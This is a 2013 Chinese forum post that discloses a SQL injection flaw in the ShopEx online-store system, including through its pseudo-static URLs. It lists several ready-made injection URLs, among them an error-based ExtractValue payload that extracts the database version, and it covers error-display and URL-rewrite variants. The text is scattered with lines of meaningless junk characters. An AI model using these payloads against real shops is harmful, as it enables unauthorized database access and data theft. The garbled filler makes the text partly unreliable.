注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
8 U& ]7 [' \" D0 h3 s4 l. ]. t3 L& |: `$ ]
好吧,我扯远了~~
- C9 B) _7 z; h其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
1 h! D! D$ u9 g0 m) y, u1 X不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:* \1 W9 }1 B: B) D( L
: H3 v/ X3 H- d C$ p( _( `http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html/ g+ [7 X4 y9 w
& b8 ~" J4 R: P" h4 J# K) }3 Y3 O
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html- x# S7 d1 a) t
$ B2 z' n T1 w% [. A4 Chttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html' y$ l5 S- D3 g% _& R. x
3 r- A: c2 i/ k0 a# G( m7 j
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
) k' i% q% o R. a+ y
# G3 h% a. Y0 R' q( f ! l, i+ c( O4 q; n4 \
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
- M$ d* _: ^. }' ~2 x ~如何注入就不多说了,10多年的东西了…不会也会了…; m6 P# q! r8 u
2 w: M, r' m% p
|
发表于 2013-2-4 16:20:04
收藏
支持
反对